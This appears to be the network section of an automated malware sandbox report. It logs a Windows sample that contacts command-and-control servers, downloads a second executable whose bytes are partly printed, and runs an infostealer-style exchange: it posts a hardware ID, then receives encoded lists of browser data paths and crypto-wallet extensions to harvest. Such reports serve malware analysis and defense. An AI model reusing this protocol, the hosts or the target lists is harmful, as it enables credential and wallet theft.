Apr 27, 2024 02:19:39.772764921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.772783041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.772800922 CEST	80	49733	185.172.128.76	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 27, 2024 02:19:02.499222040 CEST	192.168.2.4	1.1.1.1	0xd6bf	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:14.448008060 CEST	192.168.2.4	1.1.1.1	0x12ef	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:14.448973894 CEST	192.168.2.4	1.1.1.1	0x4937	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 27, 2024 02:20:48.139336109 CEST	192.168.2.4	1.1.1.1	0x546c	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:50.544238091 CEST	192.168.2.4	1.1.1.1	0xaab9	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 27, 2024 02:19:02.614334106 CEST	1.1.1.1	192.168.2.4	0xd6bf	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:19:17.042108059 CEST	1.1.1.1	192.168.2.4	0x3ef8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 02:19:17.042108059 CEST	1.1.1.1	192.168.2.4	0x3ef8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:14.537611008 CEST	1.1.1.1	192.168.2.4	0x12ef	No error (0)	www.google.com		142.251.32.100	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:14.539046049 CEST	1.1.1.1	192.168.2.4	0x4937	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 27, 2024 02:20:48.229664087 CEST	1.1.1.1	192.168.2.4	0x546c	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 27, 2024 02:20:50.634146929 CEST	1.1.1.1	192.168.2.4	0xaab9	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 27, 2024 02:20:50.634146929 CEST	1.1.1.1	192.168.2.4	0xaab9	No error (0)	iolo0.b-cdn.net		169.150.236.99	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.172.128.90	80	4312	C:\Users\user\Desktop\TNQTc6Qmkg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:18:57.298293114 CEST	206	OUT	GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 02:18:58.759468079 CEST	148	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:18:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.172.128.228	80	4312	C:\Users\user\Desktop\TNQTc6Qmkg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:18:59.969858885 CEST	192	OUT	GET /ping.php?substr=eight HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 02:19:00.143084049 CEST	147	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:19:00 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	185.172.128.59	80	4312	C:\Users\user\Desktop\TNQTc6Qmkg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:19:00.326092958 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 02:19:00.497540951 CEST	1289	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:19:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 27 Apr 2024 00:15:01 GMT ETag: "47e00-61708e94e86ef" Accept-Ranges: bytes Content-Length: 294400 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 75 f1 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3a c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 5d 8c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PELuxd:A0@](h`\28@0.text `.rdatal0n@@.dataKr@.rsrchj@@.reloc\`h@B [TRUNCATED]
Apr 27, 2024 02:19:00.497560978 CEST	1289	IN	Data Raw: 41 00 e8 5f 27 00 00 59 c3 b9 d4 da 01 04 e8 c8 02 00 00 68 7f 28 41 00 e8 49 27 00 00 59 c3 b9 c0 da 01 04 e8 1f 03 00 00 68 75 28 41 00 e8 33 27 00 00 59 c3 6a 00 b9 c8 da 01 04 e8 15 01 00 00 c3 6a 00 b9 bc da 01 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: A_'Yh(AI'Yhu(A3'YjjjjUQQL$$X]E]UQQQQ$ ]EYY]UVEPUQA^]QAUVEtV
Apr 27, 2024 02:19:00.497652054 CEST	1289	IN	Data Raw: 00 53 53 ff 15 30 30 41 00 8d 45 c8 50 ff 15 14 30 41 00 53 53 53 ff 15 2c 30 41 00 8d 85 b0 fb ff ff 50 53 ff 15 a0 30 41 00 53 53 ff 15 9c 30 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 48 30 41 00 53 53 53 53 ff 15 60 30 41 00 8b 45 f8 8b 0d b0 Data Ascii: SS00AEP0ASSS,0APS0ASS0AEPSEPSH0ASSSS`0AE+}uS0AEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5W=t
Apr 27, 2024 02:19:00.497745037 CEST	1289	IN	Data Raw: 55 b8 2b e8 9d 09 f7 65 f0 8b 45 f0 81 6d f4 75 6b 6d 57 b8 65 7f f8 62 f7 65 d0 8b 45 d0 81 6d f0 1a 01 37 1b 81 45 c8 65 b1 36 08 81 45 dc f6 3e 79 75 81 45 d8 02 56 5f 47 81 45 c0 d6 bd 17 3f 81 45 e4 12 5f 9d 36 b8 7b ea 48 5f f7 65 dc 8b 45 Data Ascii: U+eEmukmWebeEm7Ee6E>yuEV_GE?E_6{H_eEEMWcm%>mzmmRQ6keEE%v;QeEQKeE)#eEtUeEeED7eEmI'D eEyuSeEoeEm
Apr 27, 2024 02:19:00.497833014 CEST	1289	IN	Data Raw: ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b f9 74 1d e8 49 00 00 00 39 45 08 72 13 8b cf e8 3d 00 00 00 03 47 10 3b 45 08 76 04 b0 01 eb 02 32 c0 5f 5d c2 04 00 68 9c 88 41 00 e8 c0 03 00 00 Data Ascii: 3;_^]1U}WtI9Er=G;Ev2_]hAhAU]faayrUQEPN3B;HF]P(AUSVuWe};su'3EOu;vW
Apr 27, 2024 02:19:00.497939110 CEST	1289	IN	Data Raw: e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d 76 f4 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 0c 66 Data Ascii: s~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fo
Apr 27, 2024 02:19:00.498017073 CEST	1289	IN	Data Raw: 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 Data Ascii: pJutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYAAQ AAUEu$#3]@]U
Apr 27, 2024 02:19:00.498099089 CEST	1289	IN	Data Raw: 00 54 2e 40 00 4c 2e 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 98 2e 40 Data Ascii: T.@L.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$40@$/@Ir+$8/@$
Apr 27, 2024 02:19:00.498167992 CEST	1289	IN	Data Raw: 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 Data Ascii: $+AL$+W\|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD
Apr 27, 2024 02:19:00.498302937 CEST	1289	IN	Data Raw: 08 8b 7d e4 56 e8 2a 1c 00 00 59 c3 55 8b ec 6a 40 ff 75 0c ff 75 08 e8 2c ff ff ff 83 c4 0c 5d c3 6a 0c 68 20 8f 41 00 e8 2e 28 00 00 33 db 89 5d e4 33 c0 8b 7d 08 85 ff 0f 95 c0 85 c0 75 18 e8 7b 15 00 00 c7 00 16 00 00 00 e8 01 15 00 00 83 c8 Data Ascii: }VYUj@uu,]jh A.(3]3}u{39Et}WXY!]G@uqWYttC@A@$u)ttC@AB$to]u%W
Apr 27, 2024 02:19:00.669612885 CEST	1289	IN	Data Raw: 50 e8 90 10 00 00 59 33 c0 eb 41 03 c0 50 e8 ac 25 00 00 89 06 59 85 c0 74 ed ff 75 fc 50 6a ff ff 75 08 6a 00 53 ff 15 58 30 41 00 85 c0 75 19 ff 15 5c 30 41 00 50 e8 5a 10 00 00 ff 36 e8 c8 10 00 00 83 26 00 59 eb bd 33 c0 40 5e 5b 8b e5 5d c3 Data Ascii: PY3AP%YtuPjujSX0Au\0APZ6&Y3@^[]UQEPh@Aj0Ath@Aul0Atu]UuYu0AUQu&RYhjjjMjjj>U=@Ath@ASYtu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.172.128.76	80	6808	C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:19:02.778872967 CEST	416	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB Host: 185.172.128.76 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 45 31 42 46 37 46 41 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="hwid"22E1BF7FA224796922796------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build"default10------DHCAAEBKEGHJKEBFHJDB--
Apr 27, 2024 02:19:03.277791023 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4e 32 4d 33 4f 54 67 30 5a 44 59 79 4e 6a 67 33 59 54 51 79 59 32 51 35 4e 54 45 35 59 32 45 32 4f 57 4a 6d 59 7a 59 35 5a 57 4d 31 4f 44 59 33 4f 44 41 30 59 6a 4d 35 4d 47 49 31 4d 7a 42 68 4e 54 63 77 4e 6d 56 68 4e 7a 6b 77 4f 44 68 6a 4d 32 51 7a 4e 6d 49 31 4e 6d 5a 6a 59 6a 63 33 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: N2M3OTg0ZDYyNjg3YTQyY2Q5NTE5Y2E2OWJmYzY5ZWM1ODY3ODA0YjM5MGI1MzBhNTcwNmVhNzkwODhjM2QzNmI1NmZjYjc3fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 27, 2024 02:19:03.279793978 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Apr 27, 2024 02:19:03.561563969 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Apr 27, 2024 02:19:03.561602116 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 27, 2024 02:19:03.564460039 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"plugins------DHCAAEBKEGHJKEBFHJDB--
Apr 27, 2024 02:19:03.852745056 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:19:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Apr 27, 2024 02:19:03.852807045 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
